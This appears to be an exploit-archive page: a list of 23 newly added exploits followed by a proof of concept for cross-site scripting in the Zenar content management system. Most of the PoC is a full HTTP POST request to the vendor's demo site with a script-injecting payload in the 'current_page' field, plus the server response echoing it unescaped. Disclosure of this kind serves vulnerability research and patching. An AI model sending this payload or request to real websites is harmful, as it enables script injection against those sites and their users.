08c35595ed
23 changes to exploits/shellcodes Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit) R 3.4.4 - Local Buffer Overflow (DEP Bypass) KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection Adobe Enterprise Manager (AEM) < 6.3 - Remote Code Execution Superfood 1.0 - Multiple Vulnerabilities Private Message PHP Script 2.0 - Persistent Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Zenar Content Management System - Cross-Site Scripting GitBucket 4.23.1 - Remote Code Execution ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery Teradek Cube 7.3.6 - Cross-Site Request Forgery Teradek Slice 7.3.15 - Cross-Site Request Forgery Schneider Electric PLCs - Cross-Site Request Forgery Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass Merge PACS 7.0 - Cross-Site Request Forgery Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting
41 lines
No EOL
1.5 KiB
Text
41 lines
No EOL
1.5 KiB
Text
# Exploit Title: Zenar Content Management System - Cross-Site Scripting
|
|
# Software Link: https://zenar.io/
|
|
# Dork: N/A
|
|
# Author: Berk Dusunur
|
|
# Tested Website: http://demo.zenar.io
|
|
# Date: 2018-05-20
|
|
# Category: Web App
|
|
|
|
# PoC
|
|
|
|
# GET Request:
|
|
|
|
POST /zenario/ajax.php?method_call=refreshPlugin&inIframe=true HTTP/1.1
|
|
Host: demo.zenar.io
|
|
Cache-Control: no-cache
|
|
Connection: Keep-Alive
|
|
Accept: text/plain, */*; q=0.01
|
|
Origin: http://demo.zenar.io
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36
|
|
(KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
|
|
X-Requested-With: XMLHttpRequest
|
|
Referer: http://demo.zenar.io/enquiries/newsletter-sign-up
|
|
Accept-Language: en-us,en;q=0.5
|
|
X-Scanner: Netsparker
|
|
Cookie: PHPSESSID=27pdf3fd0plfnarmh5edk5es33
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Length: 273
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
cID=25&slideId=3&cType=html&slotName=Slot_Main_2&instanceId=143&containerId=plgslt_Slot_Main_2&formPageHash=35263a7d5401cb22f77e67fb50fcdd99&reloaded=1&inFullScreen=3&field_14=netsparker%40example.com¤t_page='"--></style></scRipt><scRipt>alert(EZK)</scRipt>
|
|
|
|
# Response:
|
|
|
|
<input type="hidden" name="formPageHash"
|
|
value="35263a7d5401cb22f77e67fb50fcdd99"/><input type="hidden"
|
|
name="reloaded" value="1"/><input type="hidden" name="inFullScreen"
|
|
value="1"/><fieldset
|
|
id="plgslt_Slot_Main_2_page_'"--></style></scRipt><scRipt>alert(EZK)</scRipt>"
|
|
class="page_"><div class="form_fields"></div><div
|
|
class="form_buttons"><input type="button" value=""
|
|
class="next"/></div> |